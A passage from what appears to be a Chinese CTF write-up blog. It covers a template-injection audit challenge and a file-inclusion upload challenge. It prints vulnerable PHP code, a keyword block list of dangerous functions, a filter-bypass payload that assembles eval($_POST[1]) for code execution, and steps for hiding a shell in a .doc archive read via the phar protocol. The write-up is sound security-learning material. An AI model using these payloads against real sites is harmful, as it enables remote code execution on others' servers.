class="string">'='</span>)&gt;<span class="number">0</span>))</span><br><span class="line">		&#123;</span><br><span class="line">			$strIf=str_replace(<span class="string">'='</span>, <span class="string">'=='</span>, $strIf);</span><br><span class="line">		&#125;</span><br><span class="line">        $strIfArr =  explode(<span class="string">'=='</span>,$strIf);</span><br><span class="line">        <span class="comment">//这里根除了=绕过 元payload中 =分割的姿势没了</span></span><br><span class="line">		<span class="keyword">return</span> (<span class="keyword">empty</span>($strIfArr[<span class="number">0</span>])?<span class="string">'NULL'</span>:$strIfArr[<span class="number">0</span>]).<span class="string">"=="</span>.(<span class="keyword">empty</span>($strIfArr[<span class="number">1</span>])?<span class="string">'NULL'</span>:$strIfArr[<span class="number">1</span>]);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseIf</span><span class="params">($content)</span></span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (strpos($content,<span class="string">'&#123;if:'</span>)=== <span class="keyword">false</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> $content;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $Rule = <span class="string">"/&#123;if:(.*?)&#125;(.*?)&#123;end if&#125;/is"</span>;</span><br><span class="line">        preg_match_all($Rule,$content,$iar);</span><br><span class="line">        $arlen=count($iar[<span class="number">0</span>]);</span><br><span class="line">        $elseIfFlag=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">for</span>($m=<span class="number">0</span>;$m&lt;$arlen;$m++)&#123;</span><br><span class="line">            $strIf=$iar[<span class="number">1</span>][$m];</span><br><span class="line">            $strIf=parseStrIf($strIf);</span><br><span class="line">            <span class="comment">//漏洞点eval 拼接字符串</span></span><br><span class="line">            @<span class="keyword">eval</span>(<span class="string">"if("</span>.$strIf.<span class="string">") &#123; \$ifFlag=true;&#125; else&#123; \$ifFlag=false;&#125;"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $content;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parse_again</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $template_html,$searchword;</span><br><span class="line">    <span class="comment">//这里没办法操作，因为searchnum被指定为2，相当于只有三个块可以用</span></span><br><span class="line">    $searchnum 	= <span class="keyword">isset</span>($GLOBALS[<span class="string">'searchnum'</span>])?$GLOBALS[<span class="string">'searchnum'</span>]:<span class="string">""</span>;</span><br><span class="line">	$type 		= <span class="keyword">isset</span>($GLOBALS[<span class="string">'type'</span>])?$GLOBALS[<span class="string">'type'</span>]:<span class="string">""</span>;</span><br><span class="line">	$typename 	= <span class="keyword">isset</span>($GLOBALS[<span class="string">'typename'</span>])?$GLOBALS[<span class="string">'typename'</span>]:<span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	$searchword = substr(RemoveXSS($searchword),<span class="number">0</span>,<span class="number">20</span>);</span><br><span class="line">	$searchnum = substr(RemoveXSS($searchnum),<span class="number">0</span>,<span class="number">20</span>);</span><br><span class="line">	$type = substr(RemoveXSS($type),<span class="number">0</span>,<span class="number">20</span>);</span><br><span class="line">	$typename = substr(RemoveXSS($typename),<span class="number">0</span>,<span class="number">20</span>);</span><br><span class="line">	$template_html = str_replace(<span class="string">"&#123;haha:searchword&#125;"</span>,$searchword,$template_html);</span><br><span class="line">	$template_html = str_replace(<span class="string">"&#123;haha:searchnum&#125;"</span>,$searchnum,$template_html);</span><br><span class="line">	$template_html = str_replace(<span class="string">"&#123;haha:type&#125;"</span>,$type,$template_html);</span><br><span class="line">	$template_html = str_replace(<span class="string">"&#123;haha:typename&#125;"</span>,$typename,$template_html);</span><br><span class="line">	$template_html = parseIf($template_html);</span><br><span class="line">	<span class="keyword">return</span> $template_html;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//被处理的关键词</span></span><br><span class="line"> $ra1 = <span class="keyword">Array</span>(<span class="string">'_GET'</span>,<span class="string">'_POST'</span>,<span class="string">'_COOKIE'</span>,<span class="string">'_REQUEST'</span>,<span class="string">'if:'</span>,<span class="string">'javascript'</span>, <span class="string">'vbscript'</span>, <span class="string">'expression'</span>, <span class="string">'applet'</span>, <span class="string">'meta'</span>, <span class="string">'xml'</span>, <span class="string">'blink'</span>, <span class="string">'link'</span>, <span class="string">'style'</span>, <span class="string">'script'</span>, <span class="string">'embed'</span>, <span class="string">'object'</span>, <span class="string">'iframe'</span>, <span class="string">'frame'</span>, <span class="string">'frameset'</span>, <span class="string">'ilayer'</span>, <span class="string">'layer'</span>, <span class="string">'bgsound'</span>, <span class="string">'title'</span>, <span class="string">'base'</span>, <span class="string">'eval'</span>, <span class="string">'passthru'</span>, <span class="string">'exec'</span>, <span class="string">'assert'</span>, <span class="string">'system'</span>, <span class="string">'chroot'</span>, <span class="string">'chgrp'</span>, <span class="string">'chown'</span>, <span class="string">'shell_exec'</span>, <span class="string">'proc_open'</span>, <span class="string">'ini_restore'</span>, <span class="string">'dl'</span>, <span class="string">'readlink'</span>, <span class="string">'symlink'</span>, <span class="string">'popen'</span>, <span class="string">'stream_socket_server'</span>, <span class="string">'pfsockopen'</span>, <span class="string">'putenv'</span>, <span class="string">'cmd'</span>,<span class="string">'base64_decode'</span>,<span class="string">'fopen'</span>,<span class="string">'fputs'</span>,<span class="string">'replace'</span>,<span class="string">'input'</span>,<span class="string">'contents'</span>);</span><br><span class="line">    $ra2 = <span class="keyword">Array</span>(<span class="string">'onabort'</span>, <span class="string">'onactivate'</span>, <span class="string">'onafterprint'</span>, <span class="string">'onafterupdate'</span>, <span class="string">'onbeforeactivate'</span>, <span class="string">'onbeforecopy'</span>, <span class="string">'onbeforecut'</span>, <span class="string">'onbeforedeactivate'</span>, <span class="string">'onbeforeeditfocus'</span>, <span class="string">'onbeforepaste'</span>, <span class="string">'onbeforeprint'</span>, <span class="string">'onbeforeunload'</span>, <span class="string">'onbeforeupdate'</span>, <span class="string">'onblur'</span>, <span class="string">'onbounce'</span>, <span class="string">'oncellchange'</span>, <span class="string">'onchange'</span>, <span class="string">'onclick'</span>, <span class="string">'oncontextmenu'</span>, <span class="string">'oncontrolselect'</span>, <span class="string">'oncopy'</span>, <span class="string">'oncut'</span>, <span class="string">'ondataavailable'</span>, <span class="string">'ondatasetchanged'</span>, <span class="string">'ondatasetcomplete'</span>, <span class="string">'ondblclick'</span>, <span class="string">'ondeactivate'</span>, <span class="string">'ondrag'</span>, <span class="string">'ondragend'</span>, <span class="string">'ondragenter'</span>, <span class="string">'ondragleave'</span>, <span class="string">'ondragover'</span>, <span class="string">'ondragstart'</span>, <span class="string">'ondrop'</span>, <span class="string">'onerror'</span>, <span class="string">'onerrorupdate'</span>, <span class="string">'onfilterchange'</span>, <span class="string">'onfinish'</span>, <span class="string">'onfocus'</span>, <span class="string">'onfocusin'</span>, <span class="string">'onfocusout'</span>, <span class="string">'onhelp'</span>, <span class="string">'onkeydown'</span>, <span class="string">'onkeypress'</span>, <span class="string">'onkeyup'</span>, <span class="string">'onlayoutcomplete'</span>, <span class="string">'onload'</span>, <span class="string">'onlosecapture'</span>, <span class="string">'onmousedown'</span>, <span class="string">'onmouseenter'</span>, <span class="string">'onmouseleave'</span>, <span class="string">'onmousemove'</span>, <span class="string">'onmouseout'</span>, <span class="string">'onmouseover'</span>, <span class="string">'onmouseup'</span>, <span class="string">'onmousewheel'</span>, <span class="string">'onmove'</span>, <span class="string">'onmoveend'</span>, <span class="string">'onmovestart'</span>, <span class="string">'onpaste'</span>, <span class="string">'onpropertychange'</span>, <span class="string">'onreadystatechange'</span>, <span class="string">'onreset'</span>, <span class="string">'onresize'</span>, <span class="string">'onresizeend'</span>, <span class="string">'onresizestart'</span>, <span class="string">'onrowenter'</span>, <span class="string">'onrowexit'</span>, <span class="string">'onrowsdelete'</span>, <span class="string">'onrowsinserted'</span>, <span class="string">'onscroll'</span>, <span class="string">'onselect'</span>, <span class="string">'onselectionchange'</span>, <span class="string">'onselectstart'</span>, <span class="string">'onstart'</span>, <span class="string">'onstop'</span>, <span class="string">'onsubmit'</span>, <span class="string">'onunload'</span>);</span><br></pre></td></tr></table></figure>

<p>//经验证 正则没理解好，提取{if{内容}}</p>
<p>&amp;content=<search>{if{haha:type}T[1])}</search>&amp;type=:ev{haha:typename}&amp;typename=al($_POS</p>
<p>1=phpinfo();</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">源表达式</span><br><span class="line"></span><br><span class="line">&#123;if:eval($_POST[1])&#125;</span><br><span class="line"></span><br><span class="line">三处替换最多可以制造三个切割点</span><br><span class="line"></span><br><span class="line">第一个替换分割if:和$_POST[1]</span><br><span class="line"></span><br><span class="line">中间一个替换分割eval</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">## 这个题主要就是通过连续替换来分割敏感字符</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">## 白给的上传 level 3</span><br><span class="line"></span><br><span class="line">参考这个：https://maxncu.github.io/2019/04/05/%E4%B8%80%E9%81%93%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/</span><br><span class="line"></span><br><span class="line">的确在好几个地方看到，后来甚至查到了wp，但是没做过这题的，做做还是挺好的</span><br><span class="line">这题是文件包含漏洞，主要是几个协议的使用</span><br><span class="line">1. php filter协议读取本地文件</span><br><span class="line">2. phar协议读取压缩包中的文件(具体参考php文档，这个性质要5.3版本以上)</span><br><span class="line"></span><br><span class="line">这题是白名单，就doc和docx可以上传，这里需要提一点本质上doc和docs都是压缩文件，所以可以用phar协议去操作</span><br><span class="line"></span><br><span class="line">我们先观察下这个f参数，参数名是upload，我们把它去掉，response为空，再试试index，该站无法正常运作。所以我猜测这里应该有文件包含漏洞，而且后台语句是include $_GET[&apos;f&apos;].&apos;.php&apos;</span><br><span class="line">那我们可以尝试用php://filter 协议读取upload和index的内容</span><br><span class="line"></span><br><span class="line">将回显base64解密</span><br><span class="line"></span><br><span class="line">``` upload.php</span><br><span class="line">&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">$msg = null;</span><br><span class="line">if(isset($_POST[&apos;submit&apos;]))&#123;</span><br><span class="line">    $ext_arr = array(&apos;doc&apos;,&apos;docx&apos;);</span><br><span class="line">    $file_ext = substr($_FILES[&apos;upload_file&apos;][&apos;name&apos;],strrpos($_FILES[&apos;upload_file&apos;][&apos;name&apos;],&quot;.&quot;)+1);</span><br><span class="line">    if(in_array($file_ext,$ext_arr))&#123;</span><br><span class="line">        $temp_file = $_FILES[&apos;upload_file&apos;][&apos;tmp_name&apos;];</span><br><span class="line">        $img_path = &quot;upload/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).&quot;.&quot;.$file_ext;</span><br><span class="line"></span><br><span class="line">        if(move_uploaded_file($temp_file,$img_path))&#123;</span><br><span class="line">   $msg=&quot;上传成功,保存路径：&quot;.$img_path;</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            $msg = &quot;上传失败&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    else&#123;</span><br><span class="line">        $msg = &quot;只允许上传.doc|.docx类型文件！&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;form enctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;</span><br><span class="line">                &lt;h1&gt;老师喊你交实验报告了&lt;/h1&gt;</span><br><span class="line">                &lt;input class=&quot;input_file&quot; type=&quot;file&quot; name=&quot;upload_file&quot;/&gt;</span><br><span class="line">                &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;上传&quot;/&gt;</span><br><span class="line">            &lt;/form&gt;</span><br><span class="line">            &lt;div id=&quot;msg&quot;&gt;</span><br><span class="line">                &lt;?php</span><br><span class="line">                    if($msg != null)&#123;</span><br><span class="line">                        echo &quot;提示：&quot;.$msg;</span><br><span class="line">                    &#125;</span><br><span class="line">                ?&gt;</span><br><span class="line">   &lt;/div&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> $f=$_GET[&apos;f&apos;];</span><br><span class="line"> if(isset($f))</span><br><span class="line">  include($f.&apos;.php&apos;);</span><br><span class="line"> else</span><br><span class="line">  header(&quot;location:index.php?f=upload&quot;)</span><br></pre></td></tr></table></figure>

<p>那么我们的思路来了，创建一个.doc改后缀为zip，把我们的shell搞进去，再上传的时候改回来，最后用phar协议读shell</p>
<p><img src="https://i.loli.net/2019/10/26/7wvkM6uENXTnVbp.png" alt="image.png"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/wp/" rel="tag"># wp</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/21/xss练习小结/" rel="next" title="xss练习小结">
                <i class="fa fa-chevron-left"></i> xss练习小结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">star</p>
              <p class="site-description motion-element" itemprop="description">ctf wp and technologies about security</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#wps"><span class="nav-number">2.</span> <span class="nav-text">wps</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#第五届上海市大学生网路安全大赛"><span class="nav-number">2.1.</span> <span class="nav-text">第五届上海市大学生网路安全大赛</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#web-decade"><span class="nav-number">2.1.1.</span> <span class="nav-text">web decade</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#web-ssrf-安恒月赛原题"><span class="nav-number">2.1.2.</span> <span class="nav-text">web ssrf (安恒月赛原题)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#web-简单地sql注入"><span class="nav-number">2.1.3.</span> <span class="nav-text">web 简单地sql注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwnhub-公开赛-web"><span class="nav-number">2.2.</span> <span class="nav-text">pwnhub 公开赛 web</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#unctf-审计（类似seacms）"><span class="nav-number">2.3.</span> <span class="nav-text">unctf 审计（类似seacms）</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">star</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
